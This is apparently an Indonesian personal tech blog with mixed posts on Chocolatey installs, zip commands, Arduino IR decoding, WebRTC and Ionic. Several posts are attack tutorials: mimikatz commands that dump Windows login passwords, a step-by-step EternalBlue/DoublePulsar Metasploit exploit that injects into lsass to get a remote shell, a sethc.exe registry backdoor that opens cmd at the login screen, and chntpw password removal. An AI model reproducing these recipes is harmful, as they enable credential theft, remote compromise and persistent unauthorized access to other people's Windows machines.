Thursday, May 25, 2017

paket installer windows hanya menggunakan cmd

install software menggunakan coco di windows
pertama buka cmd run administrator
ketikan :


C:\>powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))" && SET "PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin"C:\> choco install googlechromeC:\> choco install chocolateyC:\> choco install winrarC:\> choco install jre8C:\> choco install adobereaderC:\> choco install firefoxC:\> choco install flashplayeractivexC:\> choco install chocolatey-core.extensionC:\> choco install adobeairC:\> choco install 7zip.installC:\> choco install javaruntimeC:\> choco install skypeC:\> choco install notepadplusplus.installC:\> choco install autohotkey.portableC:\> choco install git.installC:\> choco install nodejs.installC:\> choco install vlcC:\> choco install 7zipC:\> choco install adobereader-updateC:\> choco install gitC:\> choco install putty.installC:\> choco install notepadplusplusC:\> choco install ccleanerC:\> choco install powershellC:\> choco install jdk8C:\> choco install adobeshockwaveplayerC:\> choco install silverlightC:\> choco install 7zip.commandlineC:\> choco install quicktimeC:\> choco install quicktimeC:\> choco install filezillaC:\> choco install dotnet4.5C:\> choco install puttyC:\> choco install procexpC:\> choco install rubyC:\> choco install vcredist2010C:\> choco install curlC:\> choco install dotnet3.5C:\> choco install pdfcreatorC:\> choco install nscpC:\> choco install libreofficeC:\> choco install nodejsC:\> choco install phpC:\> choco install keepass.installC:\> choco install inkscapeC:\> choco install putty.portableC:\> choco install thunderbirdC:\> choco install malwarebytesC:\> choco install atomC:\> choco install githubC:\> choco install virtualboxC:\> choco install webdeployC:\> choco install azcopyC:\> choco install strawberryperlC:\> choco install paint.netC:\> choco install ghostscript.appC:\> choco install wgetC:\> choco install mm-choco.extensionC:\> choco install chocolateyguiC:\> choco install wsus-offline-updateC:\> choco install win32-opensshC:\> choco install python2C:\> choco install sublimetext2C:\> choco install conemuC:\> choco install dropboxC:\> choco install chromiumC:\> choco install microsoft-build-toolsC:\> choco install vcredist2013C:\> choco install google-chrome-x64C:\> choco install gimpC:\> choco install teamviewerC:\> choco install urlrewriteC:\> choco install cutepdfC:\> choco install vimC:\> choco install nuget.commandlineC:\> choco install pythonC:\> choco install itunesC:\> choco install winscpC:\> choco install wiresharkC:\> choco install cygwinC:\> choco install vcredist2015C:\> choco install winscp.installC:\> choco install youtube-dlC:\> choco install kb2919442C:\> choco install kb2919355C:\> choco install windirstatC:\> choco install dotnet4.0C:\> choco install classic-shellC:\> choco install golangC:\> choco install mysql.workbenchC:\> choco install totalcommanderC:\> choco install irfanviewC:\> choco install vcredist2008C:\> choco install python3C:\> choco install boxstarter.commonC:\> choco install boxstarter.winconfigC:\> choco install boxstarter.bootstrapperC:\> choco install poshgitC:\> choco install boxstarter.chocolateyC:\> choco install lessmsiC:\> choco install visualstudiocodeC:\> choco install sublimetext3C:\> choco install calibreC:\> choco install android-sdkC:\> choco install npmC:\> choco install winmergeC:\> choco install unzip

Saturday, May 20, 2017

Cara Membuat File Zip di Linux lewat Terminal

begini caranya ..


  • Pertama siap kan dulu aplikasi yang akan di pack (jadikan zip)
  • Lalu , taruh di Desktop dan masukan folder (dalam kasus ini, folder saya adalah 'koleksiconky' )
  • Masuk terminal , ketik cd Desktop untuk masuk ke Desktop
  • lalu masukan command ini zip -r namafolderkalian.zip namafolderkalian CONTOH :  zip -r koleksiconky.zip koleksiconky ( zip -r adalah command untuk menge-pack jadi zip, dan koleksiconky.zip adalah nama hasil jadi nya, dan koleksiconky nama folder yang akan di pack )
    Sekarang di cek , hasil nya , KLIK 2X saja pada file zip tadi , dan jika sudah ada , berarti berhasil :D

program talys nuklir

video tutorial



download software: klik link  talys
manual book :talis.pdf


Tuesday, May 16, 2017

hack password login windows menggunakan usb

berikut merupakan cara hack password menggunakan usb

file dapat anda unduh di : hackpassworddadan

langkah:
masuk ke cmd run administrator

======windowsx86=======
E:\satu\Win32\mimikatz.exe

======windows x64=======
E:\satu\x64\mimikatz.exe

=======perintah=========
privilege::debug
sekurlsa::logonpasswords full 

tutorial video




Monday, May 15, 2017

hiden folder dan cara membukanya

ketikan perintah berikut di cmd:
untuk hidden :   attrib namafolder +s +h
membuka file hidden :  attrib -s -h -r /s /d

Exploit Remote Windows PC with Eternalblue & Doublepulsar Exploit in Metasploit

Through this article we are sharing recent zero day exploit which requires metasploit framework to shoot any other windows based system. This exploit is combination of two tools “Eternal Blue” which is use as backdooring in windows and “Doublepulsar” which is used for injecting dll file with the help of payload. So we will manually add this exploit in metasploit framework and step up for attacking window server 2008.
Attacker: kali Linux
Target: window 7 and window server 2008
Let’s Start!
Open the terminal in Kali Linux and type following command to download this exploit from git hub.
Git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Once the required exploit will get downloaded then open the folder and copy Eternal Blue- Doublepulsar .rb ruby file so that we can add this exploit inside metasploit.
Now past the copied ruby file inside given path Usr/share/metasploit Framework /module/exploits/windows/smbwhich will add this exploit inside metasploit framework.
Then load metasploit framework to start and type following for testing zero day exploit
Msfconsole
This module exploits vulnerability on SMBv1 and SMBv2 protocols through eternalblue. After that doublepulsar is used to inject remotely a malicious dll.
Use windows/smb/eternalblue_doublepulsar
Msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps
Msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps
Msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64
Msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe
Msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6
Msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104
Msf exploit (eternalblue_doublepulsar)>exploit
 Hence from screenshot you can observer only we need to set target’s architecture and IP before launching exploit and then when all information is set then launch your attack which will give you meterpreter session successfully like I have owned.

source code :  ETERNAL BLUE
video tutorial 
VIDEO 1

VIDEO2

VIDEO3

VIDEO4



video 5

video 6


kelemahannya diambil dari smb

Sunday, May 14, 2017

menerjemahkan kode remote InfraMerah (IR)

arduino code:

  1. #include <IRremote.h>
  2. const int RECV_PIN = 3;
  3. IRrecv irrecv(RECV_PIN);
  4. decode_results results;
  5. void setup() {
  6.   Serial.begin(9600);
  7.   irrecv.enableIRIn();  
  8. }
  9. void loop() {
  10.   if (irrecv.decode(&results)) {
  11.     Serial.println(results.value, HEX);
  12.     irrecv.resume();
  13.   }
  14. }

tonton video berikut
LIBRARY :
code

video 1










video 2





decode 433MHz RF

anda dapat mempelajari cara menerjemahkan kode rf 433MHZ dari link berikut :decodeRF

tontong beberapa video berikut


Saturday, May 13, 2017

cek tegangan non kontak

rangkaian berikut merupakan rangkaian untuk cek tegangan non contact








tutorialnya dapat anda tonton di video berikut ini






Thursday, May 11, 2017

menampilkan cmd.exe di login screen

untuk mengakses administrator ketika ada tampilan login , anda perlu melalkukan hal berikut




1. masuk ke command prompt (cmd) run sebagai administrator
2. ketikan text di bawah ini : 

cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"

untuk mengaksesnya tekan tombol shift di kiri sebanyak 5 kali, dan cmd akan tampil di halaman login windows
terimakasih semoga bermanfaat

Monday, May 8, 2017

webrtc

pengenalan webrtc     
     
     Salah satu software/aplikasi audio/video (A/V) conference yang paling terkenal saat ini di khalayak umum adalah Skype; sebuah software gratis dari microsoft. Prosesnya mudah: unduh, instal, dan pakai. Namun, semua proses tersebut harus dilakukan di komputer pribadi. Sangat jarang rasanya menemukan Skype terpasang di komputer umum misalnya di bandara, rumah sakit, atau tempat-tempat umum lainnya. Nah, apa pernah terbayang jika kita bisa melakukan audio/video conference di mana saja dan kapan saja tanpa harus terikat dengan komputer pribadi dan tanpa harus melakukan proses instalasi?

    Sebuah teknologi bernama WebRTC hadir menjawab pertanyaan di atas. Web-RTC adalah singkatan dari Web Real-Time Commnication, sebuah teknologi yang diinisialisasi oleh Google, Mozilla, Opera, dan pihak lainnya  untuk menyediakan layanan audio/video conference melalui APIs yang sederhana. Hadirnya WebRTC membawa sebuah misi masa depan dalam bidang multimedia. Dicuplik dari webrtc.org, “Our mission: To enable rich, high quality, RTC applications to be developed  for the browser, mobile platforms, and IoT devices, and allow them all to communicate via a common set of protocols”. Web-RTC menawarkan kemudahan bagi web developer untuk membuat aplikasi yang canggih dan real-time berbasis web tanpa membutuhkan plug-in, proses unduh atau proses instalasi. Selain itu, WebRTC juga dapat bekerja di banyak web browser dan antar platform atau sistem operasi baik komputer maupun mobile device. Hadirnya teknologi ini juga memberikan banyak keuntungan untuk users, dua diantaranya:

  1. Mudah: tidak membutuhkan plug-in
  2. Aman: sudah tersedia proses enkripsi  untuk media (audio/video) dan signalling sehingga WebRTC memiliki keamanan yang lebih baik dibandingkan teknologi audio/video yang sudah ada.

Arsitektur
     Pada prinsipnya WebRTC terdiri dari 2 bagian utama untuk para developer yaitu: developer untuk web browser seperti Google Chrome dan developer aplikasi web menggunakan HTML dan Javascript. Bagi kita yang belajar di codesaya, maka developer aplikasi web adalah pilihan yang tepat, terutama mempelajari Javascript.
Bagi ada yang ingin mencoba aplikasi WebRTC bisa menggunakan browser Chrome, Opera, dan Firefox



    1. Akses apprtc.appspot.com di browser anda.
    2. Klik "join" ketika halaman pertama muncul. 
    3. Setelah klik join, maka akan muncul notifikasi "allow" dan "block". Silakan klik "allow" untuk mengizinkan aplikasi mengakses kamera dan mikrofon yang terpasang di komputer/laptop.
    4. Di komputer lain, lakukan hal yang sama dan coba untuk masuk ke "room" bernomor sama.

       Sudah terbayang apa itu WebRTC? Di artikel berikutnya saya akan bahas tentang penggunaan javascript dalam WebRTC. Untuk saat ini silakan mencoba aplikasinya. Silakan kunjungi webrtc.org untuk mempelajari lebih dalam tentang APIs dan hal lain tentang WebRTC.
    webrtc merupakan salah satu bentuk kemajuan pemrograman web untuk sekarang sekarang ini



    anda dapat mempelajarinya dari source code berikut ini : belajar webrtc


    push notification ionic

    salah satu plugin yang saya gunakan push notification kali ini adalah one signal.
    salah satu aplikasinya dapat anda lihat pada gambar di bawah ini


    jika anda ingin mempelajari lebih lanjut tentang push notification , silahkan kunjungi disini
    supaya lebih jelas anda dapat tonton video berikut ini




    untuk mengirim pesan notifikasinya anda dapat melakukan dengan menggunakan php
    source codenya dapat anda lihat di sini 

    atau silahkan tonton video youtube berikut ini




    geofence ionic cordova

    salah satu penggunaan teknik geofence adalah anda dapat mengirimkan pesan saat anda berada atau keluar dari lokasi yang anda tentukan.

    contoh source code github dapat anda unduh disini
    selamat mempelajari, semoga bermanfaat.
    terimakasih


    Sunday, May 7, 2017

    cara mereset password windows menggunakan usb kali linux

    sering kali saat kita mau login ke komputer lupa passwordnya apa..atau password komputer kita udah ada yang ngeganti tanpa sepengetahuan kita


    langkahnya yaitu dengan menggunakan usb kalilinux

      1. download kali linux dan burn ke flasdisk menggunakan rufus
      2. booting usb kali linux di komputer kita pilih Live Usb Persistence
      3. setelah masuk ke kali linux, buka other location dan masuk ke direktory C system anda
      4. masuk ke /Windows/System32/config , klik kanan pilih open terminal di folder       config
     5. ketik perintah di terminal chntpw -l SAM
      6.  dan tampilannya akan seperti gambar berikut

    7. pilih username yang akan di reset contohnya kita akan mereset Administrator, lalu ketikan perintah berikut chntpw -u “Administrator” SAM

     6.  ketik 1 jika ingin menghapus user password
    7. enter
    8. ketik : y
    9. reboot

    oke, sekarang kita telah menghapus password login administrator , dan jangan lupa ketika reboot flasdisk kali linux nya di cabut lagi ya bro...
    sekian, semoga bermanfaat